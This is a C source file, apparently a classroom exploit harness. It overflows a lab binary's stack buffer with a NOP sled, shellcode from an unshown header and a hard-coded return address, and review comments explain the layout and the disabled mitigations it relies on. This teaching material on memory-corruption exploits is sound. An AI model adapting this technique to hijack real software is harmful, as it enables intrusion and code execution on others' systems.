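#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "shellcode.h"

/* Total size of the argument string handed to the victim, including its NUL. */
#define EXPLEN 109

enum {
    ADDR_LEN = 4,                         /* bytes in the overwriting address */
    RET_OFFSET = EXPLEN - ADDR_LEN - 1    /* 104: where the address bytes start */
};

/*
 * Classroom stack-overflow demonstration harness.
 *
 * Builds a single EXPLEN-byte argument and execs the lab binary named on the
 * command line (demo_victim, per the usage text) with it as argv[1].
 *
 * Layout of the argument:
 *   [0, RET_OFFSET - len)           0x90 filler (NOP sled)
 *   [RET_OFFSET - len, RET_OFFSET)  `shellcode` from shellcode.h
 *   [RET_OFFSET, RET_OFFSET + 4)    hard-coded address, little-endian
 *   [EXPLEN - 1]                    NUL terminator
 *
 * NOTE(review): the address is a fixed constant, so this only lines up with
 * one specific build and run-time layout of the victim. Presumably the lab
 * victim is built without a stack protector, with an executable stack, and is
 * run with address-space randomisation disabled; any of those mitigations
 * being active would be expected to stop this from working. Confirm against
 * the lab setup.
 *
 * Returns EXIT_SUCCESS only in the (practically unreachable) case that
 * execve() returns without error; exits with EXIT_FAILURE on bad usage, on an
 * oversized shellcode, or when the victim cannot be executed.
 */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s /path/to/demo_victim\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    char exp_str[EXPLEN];

    /*
     * The original computed EXPLEN - strlen(shellcode) - 5 without checking
     * it. With a shellcode longer than RET_OFFSET that subtraction wraps
     * around in size_t and the copy writes outside exp_str, so reject that
     * case up front.
     */
    size_t sc_len = strlen(shellcode);
    if (sc_len > (size_t)RET_OFFSET)
        errx(EXIT_FAILURE,
             "shellcode is %zu bytes; at most %d fit before the address slot",
             sc_len, (int)RET_OFFSET);

    /* Filler first, then the shellcode placed so that it ends at RET_OFFSET. */
    memset(exp_str, 0x90, sizeof exp_str);
    memcpy(exp_str + ((size_t)RET_OFFSET - sc_len), shellcode, sc_len);

    /*
     * Address of the victim's buffer, meant to land on the saved return
     * address (per the original author's note). Bytes are 0xbffffd94 stored
     * little-endian.
     */
    exp_str[RET_OFFSET + 0] = (char)0x94;
    exp_str[RET_OFFSET + 1] = (char)0xfd;
    exp_str[RET_OFFSET + 2] = (char)0xff;
    exp_str[RET_OFFSET + 3] = (char)0xbf;
    exp_str[EXPLEN - 1] = 0;

    char *args[] = { argv[1], exp_str, NULL };

    /*
     * The victim is started with an empty environment.
     * NOTE(review): presumably this keeps the victim's stack layout
     * reproducible from run to run, since the fixed address above depends on
     * it - confirm.
     */
    char *env[] = { NULL };

    if (execve(argv[1], args, env) < 0)
        err(EXIT_FAILURE, "Cannot execute %s", argv[1]);

    return EXIT_SUCCESS;
}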